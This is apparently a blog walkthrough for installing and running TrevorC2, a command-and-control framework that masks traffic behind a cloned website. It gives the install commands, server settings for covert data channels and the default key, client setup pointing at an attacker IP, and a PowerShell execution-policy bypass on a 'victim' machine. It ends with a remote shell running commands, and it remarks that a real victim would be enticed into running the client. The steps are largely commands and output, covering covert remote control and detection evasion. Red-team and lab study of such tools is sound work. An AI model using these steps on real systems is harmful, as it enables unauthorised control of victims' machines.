An Introduction to TrevorC2

I enjoy playing with new tools and one that I’m fully aware of, but havent had the chance to use is Dave Kennedy’s TrevorC2.

TrevorC2 is a client/server model for masking command and control through a normally browsable website. Detection becomes much harder as time intervals are different and does not use POST requests for data exfil. (Taken from the GitHub page)

This post is going to be a straightforward introduction to quickly installing and using the tool.

The tool can be found here: https://github.com/trustedsec/trevorc2

Installation

Installation is super simple.

Run the following from your terminal within Kali Linux.

cd /opt
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2/
pip install -r requirements.txt

Configuring the Server

Once installed, the TrevorC2 server will need to be configured.

Dave has made the trevorc2_server.py Python code very easy to understand with a comment about each configurable variable.

In my testing, I didn’t really need to change anything. It is, however, recommended that you change the encryption key.

Use whatever text editor you prefer and modify the trevorc2_server.py file as required. I would recommend changing the domain you would like to replicate and the encryption key.

# CONFIG CONSTANTS:

URL = ("https://www.google.com") # URL to clone to house a legitimate website
USER_AGENT = ("User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko")

# THIS IS WHAT PATH WE WANT TO HIT FOR CODE - THIS CAN BE WHATEVER PATH YOU WANT
ROOT_PATH_QUERY = ("/")

# THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER
SITE_PATH_QUERY = ("/images")

# THIS IS THE QUERY STRING PARAMETER USED
QUERY_STRING = ("guid=")

# STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
STUB = ("oldcss=")

# Turn to True for SSL support
SSL = False
CERT_FILE = "" # Your Certificate for SSL

# THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY
CIPHER = ("Tr3v0rC2R0x@nd1s@w350m3#TrevorForget")

Configuring the Client

All I had to modify within the trevorc2_client.ps1 code was the $SITE_URL variable. This is used to specify the URL/IP Address of the TrevorC2 server listening for connections.

nano trevorc2_client.ps1

$SITE_URL = "http://192.168.0.16"

Also modify the $CIPHER variable to match the one within the trevorc2_server.py file if you have changed it.

Starting the Server

Once the server and client Python files are configured, we’re going to start the server and start receiving agents.

Run the following to the start the server:

python trevorc2_server.py

TrevorC2 - Legitimate Website Covert Channel
Written by: David Kennedy (@HackingDave)
https://www.trustedsec.com
[*] Cloning website: https://www.google.com
[*] Site cloned successfully.
[*] Starting Trevor C2 Server...
[*] Next, enter the command you want the victim to execute.
[*] Client uses random intervals, this may take a few.
[*] Type help for usage. Example commands, list, interact.

The server is running and now listening for connections (agents). As always, I’d recommend running the help command to understand what functionality you have.

Gaining a Shell

In reality, you would entice the victim to run the following code in some way. However; for this introduction, I will simply run the trevorc2_client.ps1 file on the victim machine.

C:\Users\IEUser\Desktop>powershell -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\IEUser\Desktop> . .\trevorc2_client.ps1

As shown, on the server side of things. We have an agent to interact with.

trevorc2>
*** Received connection from 192.168.0.8 and hostname IEWIN7 for TrevorC2.

IEWIN7:trevorc2>ipconfig
[*] Waiting for command to be executed, be patient, results will be displayed here...
[*] Received response back from client...
=-=-=-=-=-=-=-=-=-=-=
(HOSTNAME: IEWIN7
CLIENT: 192.168.0.8)

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : 
 Link-local IPv6 Address . . . . . : fe80::80ac:4126:fa58:1b81%10
 IPv4 Address. . . . . . . . . . . : 192.168.0.8
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 192.168.0.1

Hopefully this gets you started. Huge thanks for Dave Kennedy for developing this awesome tool. Give him a follow if you don’t already (@HackingDave).

@5ub34x